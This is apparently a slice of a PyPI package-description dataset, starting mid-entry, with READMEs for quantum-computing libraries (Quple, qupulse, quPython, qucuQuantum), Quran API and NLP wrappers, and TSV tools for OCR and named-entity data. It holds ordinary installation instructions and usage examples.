notebooks:Tutorial 09,Tutorial 10.Quantum convolution uses aquantum filteras the basic building block. It replaces the classical filter by a Parameterised Quantum Circuit (PQC) which scan across the local regions (the receptive field) of an image.In the classical case, an output pixel value (neuron) that are connected to a local region in the input image is computed as the dot product between the kernel weights of the classical filter and the pixel values in the local region.In the quantum case, a quantum filter transforms the pixel values in the local region into the quantum states of its data circuit via a suitable feature map, hence projecting the data into a higher dimensional quantum (Hilbert) space. The quantum states are then propagated to the model circuit of the quantum filter which undergoes a sequence parameterised gate operations and outputs the expectation value of a given measurement operator.Implementation of the above concept is done via theQConv2Dclass with API similar to thetf.keras.layers.Conv2Dclass. It borrows common concepts in traditional convolution such asfilters,kernel_size,stridesandpadding.Note that thekernel_sizeof a quantum filter does not refer to the number of trainable weights in the quantum filter but instead to the dimensions of the receptive field passed to the data circuit.Quantum Image Generation and DiscriminationRelevant tutorial notebooks:Tutorial 11The essence of a quantum version of the Generative Adversarial Network (GAN) is to replace the generator and discriminator neural networks with quantum neural networks made up of parameterized quantum circuits (PQCs).Both quantum generator and discriminator neural networks consist of two key components. The first component is a data encoding circuit (i.e. theinput layer) that maps classical input dataofvariables into a quantum stateusing a quantum feature map. 
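As a concrete illustration of this encoding step, a minimal angle-encoding feature map can be written directly in Cirq (which Quple is built on). This is only a sketch with made-up feature values, not Quple's own encoding-circuit API:

```python
# Illustration only: plain Cirq, not Quple's encoding-circuit classes.
# Each classical feature is angle-encoded into a single-qubit Ry rotation.
import numpy as np
import cirq

features = np.array([0.1, 0.7, 1.3])          # made-up classical input data
qubits = cirq.LineQubit.range(len(features))  # one qubit per feature

encoding_circuit = cirq.Circuit(
    cirq.ry(2 * x).on(q) for x, q in zip(features, qubits)
)
print(encoding_circuit)
```

Quple's encoding circuits generalize this idea with configurable encoding functions and interaction graphs (see Tutorials 03-05 above).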
The quantum state is then passed to a PQC layer (represented by the circuit ($W(\\theta)$) made up of a series of parameterized local single-qubit rotationsand two-qubit entagling operations in which the circuit parameters represent the weights of a neural network.A pure quantum neural network therefore represents the combined circuit operation.Finally a total of(repetitions) of measurements (via a measurement operatorwhich usually is the Paulioperator acting on the i-th qubit) is made on one or multiple qubits of the combined circuit to measure the expectation values.Application of GAN to HEP - Generation of Electromagnetic Calorimeter Energy DepositionRelevant tutorial notebooks:Advanced Tutorial 01.The dataset of interest is a set of 32 x 32 images that represent the energy deposition on the detector cells of an electromagnetic calorimeter (ECAL).The local geometry of the energy deposition contains information about the properties of the particles that went through the detector cells which is crucial in identifying the particles of origin.In this particular dataset, two class of particles are involved: photons (class label \"0\") and electrons (class label \"1\"). Each image correspond to a single particle of origin, either photon or electron. In total, there are 498,000 samples, equally distributed between the two classes.The goal of a quantum GAN model in this case would be to generate images that simulate the given photon/electron images.One potential application of this model would be to perform fast simulation of ECAL enery deposition which can be used as an alternative to standard Monte Carlo simulators like GEANT4. This is especially useful when the requirement on the quality of the generated samples are less stringent such as for evaluation of ECAL related systematics uncertainties.Example photon images:Example electron images:The effective size of the images is roughly 8x8, so for demonstration purpose a cropped version of the images are used:Some example training outputs using theQGANclass from Quple:GAN with quantum generator + quantum discriminator using the modified mini-max loss function:GAN with quantum generator + quantum discriminator using the Wasserstein loss function:"} +{"package": "qupulse", "pacakge-description": "qupulse: A Quantum compUting PULse parametrization and SEquencing frameworkThe qupulse project aims to produce a software toolkit facilitating experiments involving pulse driven state manipulation of physical qubits.It provides a high-level hardware-independent representation of pulses as well as means to translate this representation to hardware-specific device instructions and waveforms, execute these instructions and perform corresponding measurements.Pulses can be assembled from previously defined subpulses, allowing easy construction of high-level from low-level pulses and re-use of previous work.\nAdditionally, all pulses are parameterizable allowing users to fine-tune and adapt pulse templates to specific hardware or functionality without redefining an entire pulse sequence. To ensure meaningful parameter values, constraints can be put on parameters on a per-pulse basis.Status and stabilityThe qupulse library is used productively by the Quantum Technology Group at the 2nd Institute of Physics at the RWTH Aachen University. As such, some features - such as pulse definition - are mostly complete and tested and interfaces are expected to remain largely stable (or changes to be backward compatible). 
A key goal is that experiments should be repeatable with new versions of qupulse.\nHowever, it is still possible for existing portions of the code base to be redesigned if this will increase the usability long-term.The current feature list is as follows:Definition of complex (arbitrarily deep nested and looped pulses) parameterized pulses in Python (including measurement windows)Mathematical expression evaluation (based on sympy) for parameter values and parameter constraintsSerialization of pulses (to allow storing into permanent storage)Hardware model representationHigh-level pulse to hardware configuration and waveform translation routinesHardware drivers for Tabor Electronics, Tektronix and Zurich Instruments AWGs and AlazarTech DigitizersMATLAB interface to access qupulse functionalityPending changes are tracked in thechanges.dsubdirectory and published inRELEASE_NOTES.rston release using the tooltowncrier.Installationqupulse is available onPyPiand the latest release can be installed by executing:python-mpipinstallqupulse[default]which will install all required and optional dependencies except for hardware support. qupulse version numbers follow theSemantic Versioningconventions.Alternatively, the current development version of qupulse can be installed by executingpython-mpipinstall-egit+https://github.com/qutech/qupulse.git#egg=qupulse[default]which will clone the github repository to./src/qupulseand do an editable/development install.Requirements and dependenciesqupulse requires at least Python 3.8 and is tested on 3.8, 3.9 and 3.10. It relies on some external Python packages as dependencies.\nWe intentionally did not restrict versions of dependencies in the install scripts to not unnecessarily prevent usage of newer releases of dependencies that might be compatible. However, if qupulse does encounter problems with a particular dependency version please file an issue.The backend for TaborAWGs requires packages that can be foundhere. As a shortcut you can install it from the python interpreter viaqupulse.hardware.awgs.install_requirements('tabor').The data acquisition backend for AlazarTech cards needs a package that unfortunately is not open source (yet). If you need it or have questions contactsimon.humpohl@rwth-aachen.de.DocumentationYou can find documentation on how to use this library onreadthedocsandIPython notebooks with examples in this repo. You can build it locally withpython setup.py build_sphinx.Folder StructureThe repository primarily consists of the foldersqupulse(toolkit core code) andtests(toolkit core tests). Additional parts of the project reside inMATLAB(MATLAB interface) anddoc(configuration and source files to build documentation)qupulsecontains the entire Python source code of the project and is further partitioned the following packages of related modulespulseswhich contains all modules related to pulse representation.hardwarecontaining classes for hardware representation as well as hardware driversutilscontaining miscellaneous utility modules or wrapping code for external libraries_programcontains general and hardware specific representations of instantiated (parameter free) pulses. It is private because there is no stability guarantee.Contents oftestsmirror the structure ofqupulse. 
For everysomewhere inqupulsethere should exist aTests.pyin the corresponding subdirectory oftests."} +{"package": "qupy", "pacakge-description": "Copyright (c) 2018 Ken NakanishiPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \u201cSoftware\u201d), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \u201cAS IS\u201d, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.Description: UNKNOWN\nPlatform: UNKNOWN"} +{"package": "qupython", "pacakge-description": "quPythonQuantum programs directly in Python[!WARNING]This project is currently a proof-of-concept. It will be buggy and unstable.quPython compiles Python functions into quantum programs, executes the\nprograms, and returns the results asbool-like objects.What can it do?Initialize aquPython.Qubitobject just like any other object and use it\ninside a@quantumfunction.fromqupythonimportQubit,quantum@quantumdefrandom_bit():qubit=Qubit()# Allocate new qubitqubit.h()# Mutate qubitreturnqubit.measure()# Measure qubit to boolWhen you runrandom_bit, quPython compiles your function to a quantum\nprogram, executes it, and returns results.>>>random_bit()TruequPython makes writing quantum programs feel like any other Python program.Features and examplesAllocate qubits as you go, and return classical bits asbool-like objects in\nwhatever form you like.@quantumdefghz(num_bits:int):\"\"\"Create and measure a GHZ state\"\"\"qubits=[Qubit()for_inrange(num_bits)]control,targets=qubits[0],qubits[1:]control.h()fortargetintargets:target.x(conditions=[control])return[qubit.measure()forqubitinqubits]>>> ghz(8)\n[False, False, False, False, False, False, False, False]Create classes for quantum data just as you would conventional data, and\ncondition quantum gates on classical and quantum data in exactly the same way.classBellPair:def__init__(self):self.left=Qubit().h()self.right=Qubit().x(conditions=[self.left])@quantumdefteleportation_demo():message=Qubit()bell_pair=BellPair()do_x=bell_pair.left.x(conditions=[message]).measure()do_z=message.h().measure()bell_pair.right.x(conditions=[do_x]).z(conditions=[do_z])returnbell_pair.right.measure()Generate Qiskit circuitsIf you want, you can just use quPython to create Qiskit circuits with Pythonic\nsyntax (rather than the assembly-like syntax ofqc.cx(0, 1)in native\nQiskit).# Compile using quPythonteleportation_demo.compile()# Draw compiled Qiskit circuitteleportation_demo.circuit.draw()\u250c\u2500\u2500\u2500\u2510\u250c\u2500\u2510 \nq_0: \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u25a0\u2500\u2500\u2524 H 
\u251c\u2524M\u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \u250c\u2500\u2500\u2500\u2510 \u2502 \u2514\u2500\u2500\u2500\u2518\u2514\u2565\u2518\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\u250c\u2500\u2510\nq_1: \u2500\u2500\u2500\u2500\u2500\u2524 X \u251c\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256b\u2500\u25240 \u251c\u25240 \u251c\u2524M\u251c\n \u250c\u2500\u2500\u2500\u2510\u2514\u2500\u252c\u2500\u2518\u250c\u2500\u2534\u2500\u2510 \u250c\u2500\u2510 \u2551 \u2502 \u2502\u2502 \u2502\u2514\u2565\u2518\nq_2: \u2524 H \u251c\u2500\u2500\u25a0\u2500\u2500\u2524 X \u251c\u2500\u2524M\u251c\u2500\u2500\u256b\u2500\u2524 \u251c\u2524 \u251c\u2500\u256b\u2500\n \u2514\u2500\u2500\u2500\u2518 \u2514\u2500\u2500\u2500\u2518 \u2514\u2565\u2518 \u2551 \u2502 If_else \u2502\u2502 \u2502 \u2551 \nc_0: \u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256c\u2550\u2550\u2550\u256c\u2550\u2561 \u255e\u2561 If_else \u255e\u2550\u2569\u2550\n \u2551 \u2551 \u2502 \u2502\u2502 \u2502 \nc_1: \u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2569\u2550\u2550\u2550\u256c\u2550\u25610 \u255e\u2561 \u255e\u2550\u2550\u2550\n \u2551 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2502 \u2502 \nc_2: \u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2569\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u25610 \u255e\u2550\u2550\u2550\n \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518You can compile the function without executing it, optimize the cirucit,\nexecute it however you like, then use quPython to interpret the results.fromqiskit_aer.primitivesimportSamplerqiskit_result=Sampler().run(teleportation_demo.circuit).result()teleportation_demo.interpret_result(qiskit_result)# returns `False`How it worksFor contributors (or the curious)To see how quPython works, we'll use theQubitobject outside a@quantumfunction.Qubitobjects store a list of operations that act on them.>>>qubit=Qubit()>>>qubit.h()>>>qubit.operations[quPythonInstruction(h,[])]The only way to get a classical data type from a quantum program is theQubit.measuremethod. We give the appearance that this returns abool, but\nit actually returns aQubitPromiseobject, which saves a link to the measure\noperation that created it.>>>promise=qubit.measure()>>>promiseQubitPromise()When the user calls a@quantumfunction, quPython intercepts the output,\nfinds anyQubitPromiseobjects, then traces back theQubitsthose promises\ncame from. With this information, quPython can construct theQuantumCircuitneeded to fulfil the promises. 
quPython then executes the circuit and fills in\ntheQubitPromisevalues."} +{"package": "quqcs", "pacakge-description": "qucuQUantum\u6982\u8ff0qucuQuantum \u662f\u57fa\u4e8e NVIDIA cuQuantum \u5f00\u53d1\u7684\u91cf\u5b50\u7ebf\u8def\u6a21\u62df\u5668\uff0c\u53ef\u4e0e\u542f\u79d1\u91cf\u5b50\u7f16\u7a0b\u6846\u67b6QuTrunk\u96c6\u6210\uff0c\u5b9e\u73b0\u57fa\u4e8e\u672c\u5730GPU\u670d\u52a1\u5668\u7684\u91cf\u5b50\u7ebf\u8def\u6a21\u62df\u8ba1\u7b97\u52a0\u901f\u3002qucuQuantum \u76ee\u524d\u53ea\u652f\u6301 State Vector \u7684\u91cf\u5b50\u7ebf\u8def\u6a21\u62dfqucuQuantum \u57fa\u4e8e Python \u8bed\u8a00\uff0c\u63d0\u4f9b\u95e8\u7ea7\u522b\u7684 API\uff0c \u5305\u62ecH, CH, P, CP, R, CR, Rx, Ry, Rz, Rxx, Ryy, Rzz, X, Y, Z, S, T, Sdg, Tdg, SqrtX, CSqrtX, SqrtSwap, Swap, CSwap, CNot, MCX, CY, MCZ, U1, U2, U3, U, CU, ISwap, SqrtXdg, PH\u7b49\u91cf\u5b50\u95e8qucuQuantum \u76ee\u524d\u53ea\u652f\u6301\u4e0eQuTrunk\u672c\u5730\u96c6\u6210\uff0c\u9700\u8981\u4e0eQuTrunk\u90e8\u7f72\u5728\u540c\u4e00\u53f0 NVIDIA GPU \u670d\u52a1\u5668\u4e0a\u3002\u4e0b\u8f7d\u548c\u5b89\u88c5qucuQuantum \u4f5c\u4e3a\u72ec\u7acb\u7684\u5e93\uff0c\u4e0e runtime \u96c6\u6210\uff0c\u7531 runtime \u5b8c\u6210\u90e8\u7f72\u5b89\u88c5\u3002\u4f7f\u7528\u65b9\u6cd5qucuQuantum \u5e93\u5f15\u5165QuTrunk\u4ee3\u7801\u4e2dfrom qucuQuantum.cuQuantum import BackendcuQuantum\u5728QuTrunk\u4ee3\u7801\u4e2d\uff0c\u6784\u9020QCircuit\u5bf9\u8c61\u65f6\uff0c\u6307\u5b9abackend\u4e3aBackendcuQuantum,circuit = QCircuit(backend=BackendcuQuantum())\u793a\u4f8b\u4ee3\u7801\u4ee5\u4e0b\u793a\u4f8b\u5c55\u793a\u4e86\u5229\u7528 QuTrunk \u8fd0\u884c bell-pair \u91cf\u5b50\u7b97\u6cd5\uff1a# import packagefromqutrunk.circuitimportQCircuitfromqutrunk.circuit.gatesimportH,CNOT,Measure,AllfromqucuQuantum.cuQuantumimportBackendcuQuantum# allocate resourceqc=QCircuit(backend=BackendcuQuantum())qr=qc.allocate(2)# apply quantum gatesH*qr[0]CNOT*(qr[0],qr[1])All(Measure)*qr# print circuitqc.print()# run circuitres=qc.run(shots=1024)# print resultprint(res.get_counts())# draw circuitqc.draw()\u8fd0\u884c\u7ed3\u679c\uff1a\u8bb8\u53ef\u8bc1qucuQuantum \u662f\u81ea\u7531\u548c\u5f00\u6e90\u7684\uff0c\u5728Apache 2.0\u8bb8\u53ef\u8bc1\u7248\u672c\u4e0b\u53d1\u5e03\u3002** \u4f9d\u8d56 **\u5185\u5bb9\u8981\u6c42GPU \u67b6\u6784Volta, Turing, Ampere, Ada, HopperNVIDIA GPU Compute Capability7.0+CUDA11.xCPU \u67b6\u6784x86_64, ppc64Ie, ARM64\u64cd\u4f5c\u7cfb\u7edfLinuxGPU \u9a71\u52a8450.80.02+ (Linux)"} +{"package": "quran", "pacakge-description": "Quran.com APIThis is a python wraper forquran.comv3 apiAPI will respond with English content by default, but you can get content in other language for most api calls using language query parameters. You can pass language id or language iso code as query string value. 
For list of available language seelanguagesendpoint.Using quran.comInstallingpython3-mpipinstallgit+https://github.com/dreygur/Quran.com.gitorpipinstallgit+https://github.com/dreygur/Quran.com.gitImporting Quran:fromquranimportQuranqur=Quran()MethodsfromquranimportQuranqur=Quran()# All the methods returns a dictionary object# Getting all Recitationsqur.get_recitations# Getting all available Translationsqur.get_translations()# Getting all avalailable Languagesqur.get_languages()# Getting all Tafsirs available in this apiqur.get_tafsirs()# Getting all Chapters namesqur.get_chapter(6,info=True,language='bn')# Keyworded arguments are optional# Getting all the Verses from a chapterqur.get_verses(6)"} +{"package": "quranallsbuforuni", "pacakge-description": "First Python Package"} +{"package": "quranbot-schema-registry", "pacakge-description": "No description available on PyPI."} +{"package": "qurancorpus", "pacakge-description": "A python api for the Quranic Arabic Corpus project"} +{"package": "quranerabdar", "pacakge-description": "second Python Package"} +{"package": "quranic-nlp", "pacakge-description": "QuaranicTools: A Python NLP Library for Quranic NLPLanguage Processing and Digital Humanities Lab (Language.ML)Part of Speech Tagging|Dependency Parsing|Lemmatizer|Multilingual Search|Quranic Extractions|Revelation Order|Embeddings (coming soon)|TranslationsQuranic NLPQuranic NLP is a computational toolbox to conduct various syntactic and semantic analyses of Quranic verses. The aim is to put together all available resources contributing to a better understanding/analysis of the Quran for everyone.Contents:InstallationPipline (dep,pos,lem,root)ExampleFormat inputsInstallationTo get started using Quranic NLP in your python project, you may simply install it via the pip package.Install with pippipinstallquranic-nlpYou can check therequirements.txtfile to see the required packages.PipelineThe NLP pipeline contains morphological information e.g., Lemmatizer as well as POS Tagger and Dependancy Parser in aSpacy-like pipeline.fromquranic_nlpimportlanguagetranslation_translator='fa#1'pips='dep,pos,root,lemma'nlp=language.Pipeline(pips,translation_translator)Docobject has different extensions.\nFirst, there aresentencesindocreferring to the verses.\nSecond, there areayahindocwhich is indicate number ayeh in soure.\nThird, there aresurahindocwhich is indicate name of soure.\nFourth, there arerevelation_orderindocwhich is indicate order of revelation of the ayeh.docwhich is the list ofTokenalso has its own extensions.\nThe pips is information to use from quranic_nlp.\nThe translation_translator is language for translate quran such that language (fa) or language along with # along with number books.\nFor see all translate run below codefromquranic_nlpimportutilsutils.print_all_translations()Quranic NLP has its own spacy extensions. 
If related pipeline is not called, that extension cannot be used.Format InputsThere are three ways to format the input.\nFirst, number surah along with # along with number ayah.\nSecond, name surah along with # along with number ayah.\nThird, search text in quran.Note The last two calls require access to the net for an API call.fromquranic_nlpimportlanguagetranslation_translator='fa#1'pips='dep,pos,root,lemma'nlp=language.Pipeline(pips,translation_translator)doc=nlp('1#1')doc=nlp('\u062d\u0645\u062f#1')doc=nlp('\u0631\u0628 \u0627\u0644\u0639\u0627\u0644\u0645\u06cc\u0646')Examplefromquranic_nlpimportlanguagetranslation_translator='fa#1'pips='dep,pos,root,lemma'nlp=language.Pipeline(pips,translation_translator)doc=nlp('1#4')print(doc)print(doc._.text)print(doc._.surah)print(doc._.ayah)print(doc._.revelation_order)print(doc._.sim_ayahs)print(doc._.translations)\u0625\u0650\u064a\u0651\u064e\u0627\u0643\u064e \u0646\u064e\u0639\u0652\u0628\u064f\u062f\u064f \u0648\u064e \u0625\u0650\u064a\u0651\u064e\u0627\u0643\u064e \u0646\u064e\u0633\u0652\u062a\u064e\u0639\u0650\u064a\u0646\u064f \u0646\u062d\u0646 \u0646\u062d\u0646\n\u0625\u0650\u064a\u0651\u064e\u0627\u0643\u064e \u0646\u064e\u0639\u0652\u0628\u064f\u062f\u064f \u0648\u064e \u0625\u0650\u064a\u0651\u064e\u0627\u0643\u064e \u0646\u064e\u0633\u0652\u062a\u064e\u0639\u0650\u064a\u0646\u064f \n\u0641\u0627\u062a\u062d\u0647\n4\n63\n['82#15', '83#11', '70#26', '51#12', '56#56', '82#17', '74#46', '37#20', '82#18', '15#35', '38#78', '26#82', '109#6', '51#6', '82#9', '107#1', '95#7', '40#16', '19#15', '19#33', '61#9', '9#33', '48#28', '21#103', '6#73', '3#26', '98#5', '83#5', '39#11', '40#14', '77#12', '50#42', '77#35', '77#13', '39#2', '36#71', '74#9', '85#2', '16#52', '30#30', '42#13', '75#1', '30#43', '75#6', '40#29', '39#14', '43#77', '5#3', '86#9', '26#189', '40#65', '26#87', '38#81', '15#38', '7#51', '23#113', '23#16', '79#6', '51#13', '77#14', '37#26', '9#11', '3#24', '114#2', '82#19', '11#103', '34#40', '26#135', '25#25', '70#8', '2#193', '9#29', '19#38', '2#132', '7#14', '29#65', '8#39', '64#9', '30#14', '45#27', '10#105', '110#2', '78#17', '79#35', '83#6', '77#38', '50#34', '38#79', '15#36', '37#21', '44#40', '52#9', '56#50', '90#14', '40#32', '9#36', '80#34', '26#88', '56#86', '50#20']\n\u062a\u0646\u0647\u0627 \u062a\u0648 \u0631\u0627 \u0645\u0649 \u067e\u0631\u0633\u062a\u064a\u0645 \u0648 \u062a\u0646\u0647\u0627 \u0627\u0632 \u062a\u0648 \u064a\u0627\u0631\u0649 \u0645\u0649\u200c\u062c\u0648\u064a\u064a\u0645.print(doc[1])print(doc[1].head)print(doc[1].dep_)print(doc[1]._.dep_arc)print(doc[1]._.root)print(doc[1].lemma_)print(doc[1].pos_)\u0646\u064e\u0639\u0652\u0628\u064f\u062f\u064f\n\u0648\u064e\n\u0645\u0639\u0637\u0648\u0641 \u0628\u0631 \u0645\u062d\u0644\nLTR\n\u0639\u0628\u062f\n\nVERBTo jsonify the results you can use the 
following:dictionary=language.to_json(pips,doc)print(dictionary)[{'id':1,'text':\u0627\u0644\u0652,'root':None,'lemma':'','pos':'INTJ','rel':'\u062a\u0639\u0631\u06cc\u0641','arc':'RTL','head':\u062d\u064e\u0645\u0652\u062f\u064f},{'id':2,'text':\u062d\u064e\u0645\u0652\u062f\u064f,'root':'\u062d\u0645\u062f','lemma':'','pos':'NOUN','rel':'\u062e\u0628\u0631','arc':'LTR','head':*},{'id':3,'text':\u0644\u0650,'root':None,'lemma':'','pos':'INTJ','rel':'\u0645\u062a\u0639\u0644\u0642','arc':'LTR','head':*},{'id':4,'text':\u0644\u0651\u064e\u0647\u0650,'root':'\u0623\u0644\u0647','lemma':'','pos':'NOUN','rel':'\u0646\u0639\u062a','arc':'LTR','head':\u0631\u064e\u0628\u0651\u0650},{'id':5,'text':\u0631\u064e\u0628\u0651\u0650,'root':'\u0631\u0628\u0628','lemma':'','pos':'NOUN','rel':'\u0645\u0636\u0627\u0641 \u0627\u0644\u06cc\u0647 ','arc':'LTR','head':\u0639\u064e\u0627\u0644\u064e\u0645\u0650\u06cc\u0646\u064e},{'id':6,'text':\u0627\u0644\u0652,'root':None,'lemma':'','pos':'INTJ','rel':'\u062a\u0639\u0631\u06cc\u0641','arc':'RTL','head':\u0639\u064e\u0627\u0644\u064e\u0645\u0650\u06cc\u0646\u064e},{'id':7,'text':\u0639\u064e\u0627\u0644\u064e\u0645\u0650\u06cc\u0646\u064e,'root':'\u0639\u0644\u0645','lemma':'','pos':'NOUN','rel':'','arc':None,'head':\u0639\u064e\u0627\u0644\u064e\u0645\u0650\u06cc\u0646\u064e},{'id':8,'text':*,'root':None,'lemma':'','pos':'','rel':'','arc':None,'head':*}]To jsonify the results you can use the following:fromspacyimportdisplacyfromquranic_nlpimportlanguagefromquranic_nlpimportutilstranslation_translator='fa#1'pips='dep,pos,root,lemma'nlp=language.Pipeline(pips,translation_translator)doc=nlp('1#4')displacy.serve(doc,style=\"dep\")options={\"compact\":True,\"bg\":\"#09a3d5\",\"color\":\"white\",\"font\":\"xb-niloofar\"}displacy.serve(doc,style=\"dep\",options=options)"} +{"package": "quranpy", "pacakge-description": "quranpyPython Package to interact with the Glorious Qur'an!This package uses theAl Quran CloudAPI to bring you verses and surahs of the Qur'an.Start by importing the package:importquranpyFeatures:Get verses of the Qur'an on demandverses=quranpy.show_verses(ayah=\"112:2-4\",edition=quranpy.Editions.sahih_international)print(verses)# will show Surah Ikhlas verses 2, 3 and 4 with Sahih International translation['Allah, the Eternal Refuge.','He neither begets nor is born,','Nor is there to Him any equivalent.\"']Easy info on Surahs of the Qur'anal_lail=quranpy.Surah(chapter=quranpy.Chapters.layl,edition=quranpy.Editions.pickthall# will show the Pickthall translations)print(str(al_lail))print(al_lail.number)print(al_lail.arabic_name)print(al_lail.name)print(al_lail.translation)print(al_lail.period)print(al_lail.show_verses(\"1-3\"))Surah Al-Lail - The Night\n92\n\u0633\u0648\u0631\u0629 \u0627\u0644\u0644\u064a\u0644\nAl-Lail\nThe Night\nMeccan\n[By the night enshrouding, And the day resplendent, And Him Who hath created male and female,]Search for terms which appear in the Qur'anresults=quranpy.Search(term=\"Moses\",edition=quranpy.Editions.yusufali,surah=quranpy.Chapters.anbiya)print(results)print(results.verses)2 count(s) of \"Moses\" in Surah Al-Anbiyaa (in this edition)\n[In the past We granted to Moses and Aaron the criterion (for judgment), and a Light and a Message for those who would do right,-, Before this We wrote in the Psalms, after the Message (given to Moses): My servants the righteous, shall inherit the earth.\"]For more information,read the documentation.Seetest.pyfor more in depth examples and ways to use the lib.Assalamwalaikum 
warahmatullahi wa barakatuhu!"} +{"package": "quran.py", "pacakge-description": "quran.pyAn easy to use API wrapper for Quran.com v4 written in Python.InstallationUse the package managerpipto install. (Gitrequired as well.)pipinstallgit+https://github.com/Jadtz/quran.py.gitUsagefromquran.versesimportVersesvrs=Verses()vrs.get_chapter()# returns complete chapter from Quran.vrs.get_juz()# returns all verses from a specific juz(1-30).vrs.get_page()# returns all verses of a specific Madani Mushaf page(1 to 604).vrs.get_hizb()# returns all verses from a specific Hizb( half(1-60).vrs.get_rub()# returns all verses of a specific Rub number(1-240).vrs.get_verse()# returns a specific ayah with key.#example for verse key, \"10:5\" is 5th ayah of 10th surah.ContributingPull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.Please make sure to update tests as appropriate.LicenseMIT"} +{"package": "quran-rofi", "pacakge-description": "Al-Quran RofiAl-Quran dengan Terjemahan / Tafsir JalalaynInstallRequirementsRofixclipInstallasipip install quran-rofiConfigurePengaturan font Quran dan Murotal ada di file~/.config/quran-rofi.ini, untuk contoh confignya adadisiniFile Murotal ada di folder~/.local/share/Quran/murotal/, untuk contoh formatnya adadisiniFontUpdate cache font dengan :$ fc-cache -fvPreview Al-Quran RofiPerubahan0.1.8Menggunakanalquran-id0.1.10Menambahkan fitur murotal"} +{"package": "qurator-sbb-tools", "pacakge-description": "This package currently provides:A set of tools to perform NER+EL on the digitalized collections of the SBB.A set of tools for Wikidata/Wikipedia knowledge-base extraction.A set of tools to perform and visualize topic-modelling on the digitalized collections of the SBB.Installation:Setup virtual environment:virtualenv --python=python3.6 venvActivate virtual environment:source venv/bin/activateUpgrade pip:pip install -U pipInstall package together with its dependencies in development mode:pip install -e ./"} +{"package": "qurator-sbb-utils", "pacakge-description": "This package provides shared functionality forsbb_toolssbb_knowledge-basesbb_nersbb_nedsbb_topic-modellingsbb_web_integrationpage2tsvInstallation:Setup virtual environment:virtualenv --python=python3.6 venvActivate virtual environment:source venv/bin/activateUpgrade pip:pip install -U pipInstall package together with its dependencies in development mode:pip install -e ./"} +{"package": "qurator-tsvtools", "pacakge-description": "TSV - Processing ToolsCreate .tsv files that can be viewed and edited withneat.Installation:Clone this project and theSBB-utils.Setup virtual environment:virtualenv --python=python3.6 venvActivate virtual environment:source venv/bin/activateUpgrade pip:pip install -U pipInstall package together with its dependencies in development mode:pip install -e sbb_utils\npip install -e page2tsvPAGE-XML to TSV Transformation:Create a TSV file from OCR in PAGE-XML format (with word segmentation):page2tsv PAGE1.xml PAGE.tsv --image-url=http://link-to-corresponding-image-1In order to create a TSV file for multiple PAGE XML files just perform successive calls\nof the tool using the same TSV file:page2tsv PAGE1.xml PAGE.tsv --image-url=http://link-to-corresponding-image-1\npage2tsv PAGE2.xml PAGE.tsv --image-url=http://link-to-corresponding-image-2\npage2tsv PAGE3.xml PAGE.tsv --image-url=http://link-to-corresponding-image-3\npage2tsv PAGE4.xml PAGE.tsv --image-url=http://link-to-corresponding-image-4\npage2tsv PAGE5.xml PAGE.tsv 
--image-url=http://link-to-corresponding-image-5\n...\n...\n...For instance, for the fileexample.xml:page2tsv example.xml example.tsv --image-url=http://content.staatsbibliothek-berlin.de/zefys/SNP27646518-18800101-0-3-0-0/left,top,width,height/full/0/default.jpgProcessing of already existing TSV files:Create a URL-annotated TSV file from an existing TSV file:annotate-tsv enp_DE.tsv enp_DE-annotated.tsvCommand-line interface:page2tsv [OPTIONS] PAGE_XML_FILE TSV_OUT_FILE\n\nOptions:\n --purpose [NERD|OCR] Purpose of output tsv file.\n \n NERD: NER/NED application/ground-truth creation.\n \n OCR: OCR application/ground-truth creation.\n \n default: NERD.\n --image-url TEXT\n --ner-rest-endpoint TEXT REST endpoint of sbb_ner service. See\n https://github.com/qurator-spk/sbb_ner for\n details. Only applicable in case of NERD.\n --ned-rest-endpoint TEXT REST endpoint of sbb_ned service. See\n https://github.com/qurator-spk/sbb_ned for\n details. Only applicable in case of NERD.\n --noproxy disable proxy. default: enabled.\n --scale-factor FLOAT default: 1.0\n --ned-threshold FLOAT\n --min-confidence FLOAT\n --max-confidence FLOAT\n --ned-priority INTEGER\n --help Show this message and exit."} +{"package": "qurcol", "pacakge-description": "qurcol - view, query and convert columnar storage files from command linequrcol(as in \"query columnar ...\") is a tool that enables its users to\nquickly explore the content of a file in a column-oriented storage format (likeApache Parquet, for example), using command line\nonly and without the need for more complex software like Spark or Pandas.It allows viewing the file content, schema, querying the content with SQL and\nconverting the data to 